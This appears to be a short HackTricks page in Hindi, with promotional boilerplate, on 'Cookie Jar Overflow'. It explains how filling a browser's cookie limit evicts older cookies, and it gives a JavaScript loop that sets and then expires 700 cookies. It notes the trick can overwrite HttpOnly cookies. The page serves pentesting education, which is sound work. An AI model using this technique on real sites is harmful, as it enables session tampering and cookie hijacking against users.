Cookie Jar Overflow

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सब्सक्रिप्शन प्लान्स देखें!
आधिकारिक PEASS और HackTricks स्वैग प्राप्त करें
हमारे विशेष NFTs कलेक्शन, The PEASS Family खोजें
शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या हमें ट्विटर 🐦 @carlospolopm** पर फॉलो** करें।
हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके HackTricks और HackTricks Cloud github repos में।

ब्राउज़रों के पास पेज के लिए जितने कुकी हो सकते हैं, उस पर सीमा होती है। इसलिए, यदि किसी कारणवश किसी कुकी को गायब करने की आवश्यकता हो, तो आप कुकी जार को ओवरफ्लो कर सकते हैं क्योंकि सबसे पुरानी कुकी हटा दी जाएगी:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

ध्यान दें, एक अलग डोमेन पर पोइंट करने वाले थर्ड पार्टी कुकीज को अधिलेखित नहीं किया जाएगा।

यह हमला HttpOnly कुकीज को भी ओवरराइट करने के लिए उपयोग किया जा सकता है क्योंकि आप इसे हटा सकते हैं और फिर आप चाहते हैं उस मान के साथ इसे रीसेट कर सकते हैं।

इसे इस पोस्ट के साथ एक लैब के साथ जांचें।

PreviousCookie Tossing NextCookie Bomb

Last updated 2 months ago